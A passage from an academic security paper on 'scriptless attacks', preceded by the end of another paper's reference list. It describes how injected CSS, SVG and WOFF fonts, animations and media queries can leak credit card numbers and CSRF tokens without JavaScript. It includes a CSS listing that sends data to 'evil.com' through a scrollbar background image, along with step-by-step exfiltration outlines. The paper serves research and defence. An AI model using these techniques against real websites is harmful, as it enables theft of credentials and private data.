Domains of Affine Relations,” in Static Analysis Symposium, Venice,
Italy, Sep. 2011, to appear.
[17] A. King and H. Søndergaard, “Automatic Abstraction for Congruences,”
inVerification, Model Checking, andAbstract Interpretation, ser. LNCS,
G. Barthe and M. Hermenegildo, Eds., no. 5944. Madrid, Spain:
Springer, Jan. 2010, pp. 197–213.
[18] P. Cousot, R. Cousot, J. Feret, A. Min  ́e, L. Mauborgne, D. Monniaux,
and X. Rival, “Combination of Abstractions in the ASTR  ́EE Static An-
alyzer,” in Asian Computing Science Conference, ser. LNCS, M. Okada
and I. Satoh, Eds., vol. 4435. Tokyo, Japan: Springer, Dec. 2006, pp.
272–300.
[19] A. Simon and A. King, “Analyzing String Buffers in C,” in Algebraic
Methodology and Software Technology, ser. LNCS, H. Kirchner and
C. Ringeissen, Eds., vol. 2422. Reunion Island, France: Springer, Sep.
2002, pp. 365–379.
[20] ——, “Taming the Wrapping of Integer Arithmetic,” in Static Analysis
Symposium, ser. LNCS, G. File and H. R. Nielson, Eds., vol. 4634.
Kongens Lyngby, Denmark: Springer, Aug. 2007, pp. 121–136.
[21] P. Granger, “Static Analyses of Congruence Properties on Rational
Numbers (Extended Abstract),” in Static Analysis Symposium, P. Van
Hentenryck, Ed. Paris, France: Springer, Sep. 1997, pp. 278–292.
[22] A. Simon and A. King, “Widening Polyhedra with Landmarks,” in
Asian Symposium onProgramming Languages andSystems, ser. LNCS,
N. Kobayashi, Ed., vol. 4279. Sydney, Australia: Springer, Nov. 2006,
pp. 166–182.
[23] G. Balakrishnan, G. Grurian, T. Reps, and T. Teitelbaum,
“CodeSurfer/x86 – A Platform for Analyzing x86 Executables,”
inCompiler Construction, ser. LNCS, vol. 3443. Edinburgh, Scotland:
Springer, Apr. 2005, pp. 250–254, tool-Demonstration Paper.
[24] N. Krishnamoorthy, S. Debray, and K.Fligg, “Static Detection of Dis-
assembly Errors,” in Working Conference onReverse Engineering,
A. Zaidman, G. Antoniol, and S. Ducasse, Eds. Lille, France: IEEE
Computer Society, Oct. 2009, pp. 259–268.
[25] H. Shacham, “The Geometry of Innocent Flesh on the Bone: Return-
into-libc without Function Calls (on the x86),” in Computer and
Communications Security, S. De Capitani di Vimercati and P. Syverson,
Eds. ACM Press, Oct. 2007, pp. 552–61.
[26] Hex-Rays, “IDA Pro Disassembler,” http://www.hex-rays.com/idapro,
2009, retrieved on 14.04.2011. [Online]. Available: http://www.hex-
rays.com/idapro
[27] K. Coogan and S. Debray, “Equational Reasoning on x86 Assembly
Code,” in Source Code Analysis and Manipulation. Williamsburg,
Virginia, USA: IEEE Computer Society, Sep. 2011.
10ScriptlessAttacks–
Stealingthe PieWithoutTouching theSill
Mario Heiderich, Marcus Niemietz, Felix Schuster, Thorste n Holz, JörgSchwenk
HorstGörtz Institute forIT-Security
Ruhr-UniversityBochum, Germany
{firstname.lastname}@rub.de
ABSTRACT
Duetotheirhighpracticalimpact, Cross-SiteScripting(X SS)
attacks have attracted a lot of attention from the security
community members. In the same way, a plethora of more
or less effective defense techniques have been proposed, ad-
dressing the causes and effects of XSS vulnerabilities.
Asaresult, an adversaryoften can nolonger inject or even
execute arbitrary scripting code in several real-life scen arios.
In this paper, we examine the attack surface that remains
after XSS and similar scripting attacks are supposedly mit-
igated by preventing an attacker from executing JavaScript
code. We address the question of whether an attacker really
needs JavaScript or similar functionality to perform attac ks
aiming for information theft. The surprising result is that
an attacker can also abuse Cascading Style Sheets (CSS) in
combination with other Web techniques like plain HTML,
inactive SVG images or font files. Through several case
studies, we introduce the so called scriptless attacks and
demonstrate that an adversary might not need to execute
code to preserve his ability to extract sensitive informati on
from well protected websites. More precisely, we show that
an attacker can use seemingly benign features to build side
channel attacks that measure and exfiltrate almost arbitrar y
data displayed on a given website.
We conclude this paper with a discussion of potential mit-
igation techniques against this class of attacks. In additi on,
we have implemented a browser patch that enables a website
to make a vital determination as to being loaded in a de-
tached view or pop-up window. This approach proves useful
for prevention of certain types of attacks we here discuss.
Categories andSubject Descriptors
K.6.5 [Security and Protection ]: Unauthorized access
General Terms
Security
Permission to make digital or hard copies of all or part of thi s work for
personal or classroom use is granted without fee provided th at copies are
not made or distributed for profit or commercial advantage an d that copies
bear this notice and thefull citation on the firstpage. Tocop y otherwise, to
republish, topostonserversortoredistribute tolists,re quires priorspecific
permission and/or afee.
CCS’12,October 16–18, 2012, Raleigh, North Carolina, USA.
Copyright 2012 ACM 978-1-4503-1651-4/12/10 ...$15.00.Keywords
Scriptless Attacks, XSS, CSS, SVG, HTML5, Attack Fonts
1. INTRODUCTION
In the era of Web 2.0 technologies and cloud computing,
a rich set of powerful online applications is available at ou r
disposal. These Web applications allow activities such as o n-
line banking, initiating commercial transactions at the on -
line stores, composing e-mails which may contain sensitive
information, or even managing personal medical records on-
line. It is therefore only natural to wonder what kind of
measures are necessary to protect such data, especially in
connection with security and privacy concerns.
A prominent real-life attack vector is Cross-Site Scripting
(XSS), a type of injection attack in which an adversary in-
jectsmalicious scriptsintoanotherwisebenign(andtrust ed)
website [11,27]. Specifically, XSS supplies an attacker wit h
an option of manipulating a Web page across different sites
with the help of scripts. For this kind of attacks, JavaScrip t
is typically employed as the language of choice; once the
malicious script executes, it has full access to all resourc es
that belong to the trusted website (e.g., cookies, authenti ca-
tion tokens, CSRF tokens). Because of their high practical
impact, XSS attacks and related browser-security research
have attracted a lot of attention from the security commu-
nity during the recent years [20,22,29,31,32,41,46,48,51 ].
PreventingXSSbyPreventingExecutabilityofCode.
Followingthedevelopmentsandpublishedworkmentioned
above, a plethora of more or less feasible defense technique s
has been proposed. All these attempts have a clear goal:
stopping XSS attacks [6,26,31,41,44]. In general, one can
say that if an attacker manages to execute JavaScript on
the target domain, then she can control the whole Web page
navigated at by the victim. Therefore, a recommended miti-
gation strategy would be todeactivate/limit JavaScriptco de
execution for security reasons, employing tools such as No-
Script [33], Content Security Policy (CSP) [43], or, alter-
natively, making use of HTML5-sandboxed Iframes. This
approach is reasonable if an application can function with-
out external JavaScript, which is not always the case for
modern Web 2.0 applications. Furthermore, a website in-
creases its robustness and upgrades protection level again st
attacks – one example of such action being frame-busting
code in order to mitigate classical clickjacking attacks [4 0].
As a result, limiting or disabling JavaScript synchronousl y
disables the aforementioned protection mechanism.
Going back one step, we note that XSS attacks need to
meet three preconditions guaranteeing their success:
1.Injectability : the attacker must be able to inject data
into the Document Object Model (DOM) rendered by
the Web browser.
2.Executability : if JavaScript (or any other code) is in-
jected, it must be executed.
3.Exfiltration Capability : attacker-harvested data must
be delivered to another domain or resource for further
analysis and exploitation.
The fact that XSS recently replaced SQL injection and re-
lated server-side injection attacks as the number one threa t
in the OWASP ranking [36] indicates that these three pre-
conditions are fulfilled by many Web applications. As ob-
served above, several current mitigation approaches again st
XSS concentrate on the second precondition, mainly since
injectability is often a desired feature in many Web 2.0 ap-
plications. Internet users are encouraged to contribute co n-
tent and data exchange between different Web applications
through the DOM is increasingly used. Thus, server- and
client-side XSS filters try to remove scripts from the inject ed
content, or, theytrytomodify/replace these scripts ina wa y
that they are not executed in the browser’s DOM. The typ-
ical advise reads: in case we successfully prevent injected
JavaScript from being reflected or executed, a Web applica-
tion can be considered secure against XSS attacks.
Note that a browser’s rendering engine is often used in
other tools, such as e-mail clients or instant messengers, t o
display HTML content. By default, scripting is disabled in
these kinds of software to prevent attacks like XSS in the
context of e-mail processing or instant messaging. Again,
the defense approach is to temper the attacks by preventing
the second precondition from occurring.
BeyondScript-basedAttacks.
In this paper, we evaluate whether restricting scripting
content is sufficient for attack mitigation by examining it
in practice. We raise the question of an attacker actually
needing JavaScript (or another language) to perform XSS
attacks. The attack model that we use throughout the pa-
per is as follows. First, we assume that precondition 1 re-
mains fulfilled, which is reasonable in modern web applica-
tions as explained above. Secondly, we nonetheless assume
thatscripting is completely disabled , so that we can be sure
that XSS attacks would not work because the precondition
of executability is not met (i.e., JavaScript content will n ot
be executed). Precondition 3 is granted by a vast major-
ity of web applications, since extensive efforts are require d
to make sure that HTTP requests to arbitrary external do-
mains are being blocked by the application itself.
It is important to note that this attack model enables
an adversary to inject arbitrary markup such as Cascading
Style Sheet (CSS) markup into a website. We show that
CSS markup, which is traditionally considered to be only
used for decoration/display purposes, actually enables an
attacker to perform malicious activities. More precisely, we
demonstrate that an adversary can use CSS in combination
with other Web techniques such as inactive SVG images,
font files, HTTP requests, and plain inactive HTML, all to
achieve a partial JavaScript-like behavior. As a result, an
adversarycansteal sensitivedata, includingpasswords, f roma given site. For this work, our running example is a Web
application that contains a form for entering credit card in -
formation. We introduce several novel attacks that we call
scriptless attacks , as an attacker can obtain the credit card
number by injecting markup to this page without relying on
any kind of (JavaScript) code execution. We present several
proof-of-concept scriptless attacks with increasing soph isti-
cation, illustrating the practical feasibility of our tech niques.
Neither of the discussed attacks depends on user interactio n
on the victim’s part, but uses a mix of benign HTML, CSS
andWeb Open Font Format (WOFF[23]) features combined
with a HTTP-request-based side channel tomeasure and ex-
filtrate almost arbitrary data displayed on the website.
It must be highlighted that traditional server- and client-
side defense mechanism designed to prevent XSS, such as
HTMLPurifier, NoScript or several other tested XSS filter-
ingsolutions, arenotyetfullypreparedtoaddressourscri pt-
less attacks. This is mainly due to the fact that we do not
rely on injecting scripts or executing code.
Asafurthercontribution,weproposenewprotectionmech-
anisms againstthisnewclass ofattacks. Sincefilteringoft he
attack vectors may affect the regular content of the website,
we focusoneliminatingconditionsunderwhichtheproposed
attacks can be executed, essentially preventing requests t o
the attacker’s server. We have implemented a browser patch
that gives a website a capacity to determine whether it is
being loaded in a detached view or pop-upwindow. This ap-
proachprovesuseful for preventingcertaintypesofscript less
attacks and other attack vectors.
Contributions.
In summary, we make the following three contributions in
this paper:
•We describe an attack surface that is resulting from a
delimitation of scripting capabilities for untrustedcon-
tent in modern web applications. We show how an at-
tacker can deploymalicious code in a heavilyrestricted
executioncontext. Welabel thisclass scriptless attacks
because they donot need to execute(JavaScript) code.
•Wediscuss several novel attackvectors thatare sophis-
ticated enough to extract sensitive data (our running
example pertains to obtaining credit card numbers)
from agiven website, doingsowithout executingscript
code. The attacks utilize a sequence of benign features
which combined together bring about an attack vector
causing data leakage. We demonstrate that propri-
etary features, as well as W3C-standardized browser
functionality, can be used to concatenate harmless fea-
tures to function as a capable and powerful side chan-
nel attack. The described attacks relate to Cross-Site
RequestForgery (CSRF)and protection CSP and they
are suitable for leakingalmost arbitrary datadisplayed
on a given website. Furthermore, we identify web- and
SVG-fonts as powerful tools for assisting attackers in
obtaining and exfiltrating sensitive data from injected
websites. We have implemented proof-of-concept ex-
amples for all attacks.
•We elaborate on the existing defense mechanisms di-
rected at scriptless attacks, specifically referring to
protectiontechniquessuchasthe Content Security Pol-
icy(CSP) [43]. Regrettably, we also identify gaps in
the CSP-based protection and cover the limitations
ofX-Frame-Options header in regards to scriptless
attacks. Furthermore, we introduce a new browser
feature which we have implemented for the Firefox
browser in a form of a patch helpful for mitigating
scriptless attacks. As an additional upshot, this fea-
ture can also assist the mitigation of several other at-
tack techniques, such as double-click-jacking and drag
& drop attacks [21].
2. ATTACKSURFACEANDSCENARIOS
In the past few years, the bar for a successful attack
has been significantly raised upon the introduction of many
anewandsophisticatedtechniquespreventingattacksagai nst
web applications. Wespeculate thatthisismainly causedby
a large number of published exploits, the rise of technologi es
connected to HTML5, and the ever-growing popularity of
HTML usage in non-browser environments, i.e., a browser’s
rending engine is used in a wide variety of contexts such as
instant messaging tools like Pidgin and Skype, e-mail clien ts
such as Outlook, Thunderbird and Opera Mail, entertain-
ment hard- and software, and ultimately operating systems
such as Windows 8. As a result, all these environments re-
quire protection from HTML-based attacks. This has led
to the steady development of numerous defense approaches
(e.g., [6,26,31,41,44]). It is additionally worth noting t hat
the number of users that install security extensions like No -
Script is growing: NoScript blocks a large range of attacks
against website users by simply prohibiting JavaScript exe -
cution [33]. Consequently, attacks against web applicatio ns
have become more difficult and a website that deploys lat-
est defense techniques can already resist a large number of
attack vectors.
Given all these defense strategies, we expect that attack-
ers will thrive towards developing techniques that functio n
in rendering contexts that either do not allow script execu-
tion or heavily limit the capabilities of an executed script .
For instance, HTML5 suggests using sandboxed Iframes for
untrusted content; these essentially limit script executi on
up to fully blocking it and they will become crucial trust
tokens for future web applications. A very basic question
hence comes to mind: can an adversary still perform mali-
cious computations in such a restricted context?
A continuously viable attack scenario is to develop tech-
niques to retrieve and leak data across domains by (ab)using
seemingly benignfeatures and concatenating them into ac-
tual attack vectors. We presume that these scenarios will
gain significance in the future, as a number of defense tech-
niques discussed above carries on growing. The attacks
here-introduced are based on this exact approach and target
systems that are “injectable”, yet they cannot execute any
JavaScript (or another language) code. Thus, we term our
approach scriptless attacks . During the creation of these at-
tacks, our goal was to achieve data leaks similar to the ones
possible for classical XSS attacks.
The following list briefly describes some scenarios where
HTML is used in browsers or browser-like software, but
JavaScript is either restricted or completely disabled for se-
curity and/or privacy reasons. Our attack techniques targe t
these scenarios because scriptless attacks enable data lea k-
age even in such heavily restricted environments:
1.HTML5 Iframe sandbox : The HTML specificationdescribes a feature that allows a website to frame ar-
bitrary data without enabling it to execute scripts and
similar active content. The so called Iframe sandbox
can be invoked by simply applying an Iframe element
with asandbox attribute. By default, the sandbox
is strict and blocks execution of any active content,
form functionality, links targeting different views and
plugin containers. The restrictions can be relaxed by
adding space-separated values to that attribute con-
tent. Thus, with these settings, a developer can for
instance allow scripting but disallow access to parent
frames, allow form functionality, or allow pop-ups and
modal dialogs. Although sandboxed Iframes are cur-
rently only available in Google Chrome and Microsoft
Internet Explorer, we predict their wider adoption as
the described feature appears in the HTML5 specifica-
tion. A reduced version of sandboxed Iframes, labeled
security restricted Iframes , has been available in the
very early versions of Internet Explorer, for example
in MSIE 6.0.
2.Content Security Policy (CSP) : The Content Se-
curity Policy is a proposed and actively developed pri-
vacy and security tool. Specifically, it is available in
Mozilla Firefox andGoogle Chrome browsers [43]. The
CSP’s purpose is the HTTP header and meta element
based restriction of content usage by the website in
question; a developer can for instance direct the user
agent to ignore in-line scripts, resources from across
domains, event handlers, plugin data, and comparable
resources such as web fonts. In Section 4 we will dis-
cuss how CSP in its current state can help mitigating
the attacks introduced in Section 3.
3.NoScript and similar script-blockers : NoScript
is a rather popular Firefox extension composed and
maintained by Maone, G. [33]. Aside from several fea-
tures irrelevant for this work, NoScript’s purpose is
to block untrusted script content on visited websites.
Normally, all script and content sources except for few
trusted default origins are blocked. A particular user
can decide whether to trust the content source and en-
able it, either temporarily or in a permanent manner.
NoScript was in scope of our research: we attempted
to bypass its protection and gain a capacity to execute
malicious code despite its presence. Let us underline
that scriptless attacks have proven to be rather effec-
tive for this purpose.
4.Client-side XSS filters : Several user agents provide
integrated XSS filters. This applies to Microsoft In-
ternet Explorer and Google Chrome as well as Firefox
with the installed NoScript extension. Our scriptless
attacks aim to bypass those filters and execute mali-
cious code despite their presence. In several examples,
we were able to fulfill our objective, despite the filter
detecting the attack and blocking scripture execution
in reaction.
5.E-mail clients and instant messaging : As noted
above, a browser’s layout engine is usually not ex-
clusively used by the browser itself, as several tools
such as e-mail clients and instant messengers equally
employ the available HTML render engines for their
purposes. Mozilla Thunderbird can be discussed as a
specific example. By default, scripting is disabled in
this type of software: an e-mail client allowing usage of
JavaScript or even plugin content inside the mail body
could induce severe privacyimplications. Scriptless at-
tacks therefore supply a potential way for attackers to
execute malicious code regardless.
In summary, there are a lot of attack scenarios in which an
adversary is either unable to execute scripts or she is heavi ly
limited by the capabilities of an executed script.
3. BEYONDSCRIPT-BASED ATTACKS
In this section, we discuss the technical details of the at-
tacks we developed during our investigation of the attack
surface related toscriptless attacks. Aswe will see, scrip tless
attackscangrantafeasible solution toneverthelessexfilt rate
and steal sensitive information in the contexts described i n
the previous section, bypassing many of the available de-
fense solutions such as sandboxed Iframes, script-blocker s
(i.e. NoScript), or client-side XSS filters. For the rest of t he
paper, we assume an attacker has the following capabilities :
1. The attacker can inject arbitrary data into the DOM
rendered by the browser – such as for instance an
HTML mail body in a webmail application. This is
a viable assumption for modern Web 2.0 applications
that encourage users to contribute content. Further-
more, the fact that XSS attacks are ranked as number
one threat according to the OWASP ranking [36] indi-
cates that injection vulnerabilities are present in many
web applications.
2. We assume that scripting is completely disabled (e.g.,
our user has NoScript installed or similar defense so-
lutions are in place, preventing an attacker from code
injection and subsequent execution). Note that tradi-
tional XSS attacks would not be feasible in this set-up
because there is no way for executing JavaScript (or
any other language) content.
We illustrate our attacks with the help of a simple web ap-
plication thatprocesses credit card numbers–it can be com-
pared to the Amazon web store or similar websites applied
with a back-end suitable for processing or delegating credi t
card transactions. This web application allows us to demon-
strate our attack vectors in a proof-of-concept scenario. W e
specifically chose credit card numbers’ processing for they
consist of only sixteen digits such as for example 4000 1234
5678 9010 . This enables us to exfiltrate information in a
short amount of time. Note that our operations are ap-
plicable to other attack scenarios as well and we will for
example explain how one can steal CSRF tokens and other
kinds of sensitive information with our method. Further-
more, we implemented a scriptless keylogger [18] that allows
remote attackers to capture keystrokes entered on a web
page, even when JavaScript is disabled (this vulnerability is
being tracked as CVE-2011-anonymized ).
3.1 Attack Components
Theattacksdescribedinthefollowing sectionstakeadvan-
tageofseveralstandardbrowserfeaturesavailable inmode rn
user agents and defined in the HTML and CSS3 specifica-
tion drafts. We list and briefly explain these features befor e
moving on to demonstrating how they can be combined tocomprise the working attack vectors. More specifically, we
show how legitimate browser features can be abused to ex-
filtrate content or establish side channels functional to ob -
tain specific information from a web browser. We found the
following browser features to be useful building blocks in
constructing attacks:
1.Web-fonts based on SVGand WOFF :TheHTML
and CSS specifications recommend browser vendors
to provide support for different web-font formats [23].
Amongthoseare Scalable Vector Graphics (SVG)fonts
andWeb Open Font Format (WOFF).Ourattacksem-
ploy these fonts and utilize their features to vary the
properties of displayed website content. SVG fonts al-
low an attacker to easily modify character and glyph
representations, change appearance of single charac-
ters, and diversify their dimensions. It is possible to
simply use attributes such as width to assure that cer-
tain characters have no dimensions by assigning“zero
width”, whereas otherattributesmayhavedistinctand
attacker-controlled dimensions. WOFF in combina-
tion with CSS3 allows using a feature called discre-
tionary ligatures orcontextual alternatives . Byspecify-
ing those for a WOFF font, arbitrary strings of almost
any length can be represented by a single character
(again given distinct dimensions for eventual measure-
ment purposes).
2.CSS-based Animations : With CSS based anima-
tions, it is possible to over time change a wide range
of CSS and DOM properties without using any script
code [14]. The properties allowing change via CSS an-
imations are flagged by specification as animatable .
An attacker can use CSS animations to change the
widthor height ofacontainer surroundingDOM nodes
that hold sensitive information, to name one example.
By being able to scale the container, the contained
content can be forced to react in specific ways to the
dimension changes. One reaction would be to break
lines or overflow the container. In case those behav-
iors are measurable, animation can cause information
leaks based on the timing parameters of that specific
behavior.
3.The CSS Content Property : CSS allows to use a
property called content to extract arbitrary attribute
values and display the value either before, after, or in-
stead of the selected element [8]. The attribute value
extraction can be triggered by the property value func-
tion’s use attr. For a benign use-case of this feature,
consider the following situation: A developer wishes
to display the link URL of all or selected links on her
website bysimplyrenderingthe contentof the hrefat-
tribute after displaying the link, but only for absolute
link URLs. This is feasible by utilizing the following
CSS code:
a[href^=http://]:after{content:attr(href)}
This powerful feature can also be used to extract sen-
sitive attribute values such as CSRF tokens, password-
field-values and similar data. Subsequently, they could
be made visible outside the attribute context. Com-
bining the extracted information with a font injection
provides a powerful measurement lever and side chan-
nel. In fact, this combination constitutes a substantial
aspect of the attacks discussed in Section 3.2 and Sec-
tion 3.3.
4.CSS Media Queries : CSS Media Queries provide
website developers with a convenient way to deploy
device-dependent style-sheets [49]. A user agent can
use a media query to for instance determine whether
the device visiting the website has a display with a
view-port width greater than 300 pixels. If this is
the case, a style-sheet optimized for wider screens will
be deployed. Otherwise, a style-sheet optimized for
smartphones and generally smaller screens and view-
ports will be chosen. The example code shown in List-
ing 1 illustrates the general technique; If the device
visiting the website deploying this CSS snippet has a
view-portwidthlarger than400pixels, thebackground
turns green; if the screen only allows a smaller view-
port width, the background will be red.
Note that these different components are all legitimate
and benign features within a browser. Only in combination
they can be abused to establish side channels and measure
specific aspects of a given website.
<style type="text/css">
@media screen and (min-width: 401px){
*{background:green;}
body:after{content:’larger view-port’}
}
@media screen and (max-width: 400px) {
*{background:red;}
body:after{content:’smaller view-port’
}
}
</style>
Listing 1: CSS Media Queries determining screen
width and deploying style-sheets accordingly
3.2 Measurement-based Content Exfiltration
using Smart Scrollbars
Initially, we have decided to focus our analysis on Webkit-
based browsers, since this browser layout engine is widely
deployed. This includes, among others, Google Chrome and
Safari, which in turn means that we cover desktop comput-
ers, laptops, iPhones andiPads, as well as the whole range of
Android browsers, Blackberry, and Tablet OS devices. The
Webkit project operates as open source and is known for
very short development cycles and fast implementation of
novel W3C and WHATWG feature suggestions. Alongside
those specifiedandrecommendedfeatures, Webkitalso ships
a wide range of non-standard features that are exclusively
available in browsers using this particular layout engine.
One of the proprietary features enables attackers to de-
liver a tricky exploit, working against websites permittin g
submission of user-generated styles. It is possible to extr act
almost arbitrary information that is displayed by the web-
site, including text content like credit card number, eleme nt
dimensions, and even HTML/XHTML attribute values such
as CSRF tokens used to protect non-idempotent HTTP re-
quests [3]. The latter becomes possible once one uses the
CSScontent feature described in Section 3.1.
We have developed a demonstration exploit [17] capable
of extracting detailed information about CSRF tokens; to
name one example, atest showed thatreadinga32 character
CSRF token requires less than 100 HTTP requests.As noted above, CSRF tokens are used by websites that
wish to protect possibly harmful GET requests from be-
ing guessable. In case an attacker can discover the link to
initiate modification of stored items, harm can be done by
simply issuing a HTTP request to that link from a different
browser navigation tab. An unguessable link – applied with
a long and cryptographically safe token – prevents this kind
of attack. The token has to be known in order to perform
the request successfully. In an attack scenario that allows
the adversary to execute arbitrary JavaScript, it is easy to
extract the token by simple DOM traversal to one of the
protected links and subsequent utilization of a side channe l
for sending the token to an off-domain location for later re-
usage. But in our attack scenario, the adversary cannot ex-
ecute JavaScript, and thus token extraction and exfiltratio n
(aside from using open textarea elements and form sub-
missions) is complicated. Velaetal. accomplished creatin ga
demonstrative heavy-load CSS-only attribute reader by us-
ing attribute-selectors back in 2009 [45]. Unfortunately, this
approach is unsuitable to read high-entropy 32+ character
CSRF tokens.
To enable a purely CSS-based data exfiltration attack, we
utilize all of the available features listed in Section 3.1, addi-
tionally combining them with one of the proprietary Webkit
features. The following outline presents the steps we under -
take to move from initial CSS injection to full stack data
exfiltration of sensitive CSRF tokens:
1. An attacker injects a style element containing a set
of CSS selectors and a font-face declaration. These
CSS selectors choose the CSRF-token-protected links
(CTPL) and their container elements. The font-face
declaration imports a set of SVG fonts that has been
carefully prepared: for each character that can appear
in the CSRF tokens, one font file is imported. Any
other character, except for the one the font has been
imported for, has zero width. A single specific charac-
ter per font that does have a width is applied with a
distinctive width value.
2. A CSS animation block is injected alongside the afore-
mentioned CSS. This animation targets the container
of the CTPL and shrinks it from an initial large size to
a specific final size. Determining this final size is cru-
cial; the attacker needs to find out what is the right
pixel size for the animation to stop to leak information
about the content enclosed by the shrinking container.
3. The injected CSS contains a content property embed-
ded by a ::before pseudo-selector for the CTPL. This
contentproperty is applied with the value attr(href) .
Thereby, the attacker can map the value of the href
attribute to the DOM and make it visible. By doing
so, the injected SVG fonts can be applied. For ev-
ery occurrence of a CTPL, a different SVG font can
be chosen. In the first selected link, the font that only
gives dimension to the character awill be selected. For
the second CTPL occurrence, the font crafted to give
dimension only to the character bwill be chosen and
so on. Successively, all CTPL can be applied with an
individual font, while all CTPL void of the character
connected to the assigned font will have no dimension
at all. Finally, all CTPL containing the characters di-
mensioned by the chosen font will have dimension of
character-width ×occurrences in pixels.
4. By decreasing the box size of the container element of
the CTPL from 100% to one pixel, the attacker can
evoke an interesting behavior: The box will be too
small for the CTPL, so the characters applied with di-
mension will break to the next line. In case the box
is then given a distinct height and no horizontal over-
flow properties, a scrollbar will appear. The moment
when scrollbar appears constitutes an opening for the
attacker to determine locally what character is being
used: specific SVG font, zero width characters and
scrollbars forced via pixel-precise animation decreas-
ing the box size are sufficient for that.
Eventually an attacker can locally determine whether a
character is uniquely dimensioned and therefore present in
the CTPL. The only obstacle for not being able to remotely
determine this character is the lack of a back-channel ap-
plicable for scrollbars. There is no standardized way to ap-
ply background images or similar properties to scrollbars.
Webkit – an exception among all other tested browser lay-
out engines – provides this feature. A developer can select
any component of a window’s or HTML element’s scrollbar
and apply almost arbitrary styles. This includes box shad-
ows, rounded borders, and background images. However,
our investigation showed that typical scrollbar backgroun d
images are requested directly after page-load. Therefore,
this property is seemingly uninteresting for timing purpos e
and development of a side channel obtaining information
about the time of appearance or sheer existence. Neverthe-
less, further investigation of the Webkit-available pseud o-
classes and state selectors unveiled a working way to misuse
scrollbar states combined with backgroundimages for actua l
timing and measuring attacks. Several of the state selector s
allow assignment of background images and based on that
fact the specific state (such as an incrementing scroll affect -
ing the background of the scrollbar track) have to actually
occur. Here and then, the background will be loaded on
entering this CSS-selected state and not on page-load. This
allows an adversary to indeed use the measuring of scrollbar
appearance for timing and side channel data exfiltration.
TheCSScodesample showninListing2demonstrates one
of the state selectors capable of working as a side channel.
During our tests based on the Webkit scrollbar feature, de-
termination of sensitive content took only few seconds. The
victim would not necessarily notice the malicious nature if
the performed CSS animation.
<div id="s">secret</div>
<style type="text/css">
div#s::-webkit-scrollbar -track-piece
:vertical:increment {
background:red url( //evil.com?s);
}
</style>
Listing 2: A working side channel: Scrollbar CSS
for track-piece incrementing vertically.
Wecreatedapublictest-caseavailableat http://html5sec.
org/webkit/test to demonstrate this side channeling at-
tack after the issue was disclosed responsibly to the Google
Chrome development team. To mitigate this attack, we
recommended to treat scrollbar backgrounds and scrollbar
state backgrounds equally; all background images and simi-
lar external resources should be loaded duringpage-load an d
noton appearance or state occurrence. These two aspectscreate an attack window allowing side channel attacks and
appearance-probing usable for leaking sensitive data and
page parameters as demonstrated in the attack explained
above.
Connecting the general attack technique with the running
example of having a credit card number displayed on an at-
tackedwebsite, theinjectedfontwill provideoneligature per
digit-group of the credit card number. To create a WOFF
font containing all possible groups of numbers necessary to
brute-forceacreditcardnumber,anamountofnomorethan
9,999 or 999,999 distinct ligatures is necessary, dependin gon
the credit card manufacturer. Every digit-group will then
have a distinct width and can thus be exfiltrated through a
determination as to when the scrollbar appears during the
size-decreasing animation process. We successfully teste d
this approach in our example scenario and found that we
could reliably determine and exfiltrate this information.
3.3 Content Exfiltration using Scrollbar De-
tection andMedia Queries
During our research of the Webkit specific scrollbar data
leakage capabilities, we attempted to develop a technique
that can accomplish similar results in any other browser
through standardized features. Additionally, extraction of
single characters can turn out to be a long lasting task not
optimal for effective targeted attacks. Our goal was there-
fore to continue research on attack techniques that have
larger impact, on the whole being more efficient and more
generic in comparison to the rather specific “Smart Scroll-
bar” approach presented above. Beware that without deep
understanding of the attack surface and possible impact, as
well as the involved features and adversaries, effective de-
fense as discussed in Section 4 is complicated if not impos-
sible.
We utilized the aforementioned technique [16] of deploy-
ing CSS Media Queries to elevate the scrollbar-based data-
leakage and made it applicable to all modern browsers. It
also helped separating the core problem, moving from a
smallimplementationquirkintorepresentinganactualdes ign-
based security issue. Media Queries, as described in Sec-
tion 3.1, allow determination of a device’s view-port size.
Based on this judgment process, they deploy various and
most likely optimized CSS files and rules. To have a scroll-
bar be a source for data-leakage problems as described in the
aforementioned attack in Section 3.2, the attacker needs to
find out when and why the scrollbars appear. More specifi-
cally, the adversary can resize elements up to a certain poin t
and use the scrollbar to determine if the element contains
a certain other element or text node of distinct value. The
distinct size is the actual part where CSS Media Queries will
help unveiling if a scrollbar is there or not. The following
steps demonstrates how detecting scrollbar existence with
CSS Media Queries works in detail:
1. A website deploys an Iframe embedding another web-
site. A maliciously prepared CSS injection is part of
this embedded website. The Iframe is set to a width of
100%, therefore fills the whole embedding window in
regards to width-feature. The height of the Iframe can
be set to an arbitrary value depending on what data
should be leaked.
2. The embedding website is set to a specific width. This
willmakesurethat, giventhe100%widthoftheIframe,
Figure 1: Decreasing vertical view-size leads to a
scrollbar appear – which decreases the horizontal
view-size and causes a different media query to ex-
ecute
the embedded site will obey to that width and set
its view-port dimensions accordingly. The framed/em-
bedded website uses injected CSS Media Queries that
deploy two states. The first state uses almost the same
width as the embedding page. Consider the framing
view-port having a width of 430px, then the framed
website’s first media querywill listen for a device view-
port width of 400px. A second CSS Media Query will
now listen for a device view-port width of 390px. Note
that once the Iframe decreases width by only ten pixel,
the media query for 400px will not match anymore. At
the same time, the second media query shall be acti-
vated and deploy its assigned styles, including back-
ground image requests and alike.
3. As a next step, the height of the Iframe embedding
the injected site will be changed. This can be per-
formed by a CSS animation and the Webkit-specific
information leak, a script running on the website host-
ing the Iframe, or a manual size change in case the
attacker generated a pop-up or an Iframe displayed in
the edit-mode; if the hosting site displays the Iframe
in edit-mode, a click-and-drag action will accomplish
the resize (consider a browser-game scenario for social
engineering).
The CSS animation persists to be the most likely case
not requiring any user interaction. Once the height
of the Iframe is reduced, the size change will force its
contents to line-break. By itself, this breaking line
will generate a vertical scrollbar forced by the injected
overflow-behavior or simply the window default.
Thescrollbar willoccupyabout10-15pixelsandthereby
reduce the view-port size from 400 to 390 or less pixels
in width. This will trigger the second media query and
a background image can be displayed, in parallel leak-
ing the exact position and time of the line-break, the
scrollbar appearanceandtherebythewidthandnature
of the information contained by the box. This finalizes
the attack and classifies the combination of aforemen-
tioned features with CSS Media Queries as yet another
potential information leak. The screenshot in Figure 1
illustrates this case.
Figure 2: Assigning the contextual alternative string
“supersecret”to a specific character with the help of
theFontForge tool
Again, we created a public test-case available at http:
//html5sec.org/scrollbar/test to demonstrate scriptless
determination of scrollbar existence. To initiate the test ,
the window has to be initially resized, and then manually
reducedinheightinamannerofdraggingitslower boundary
towards the upper boundary. Note that this can of course
be accomplished automatically across domains.
To combine this attack technique with our running ex-
ample, we simply use the size-decreasing pop-up window or
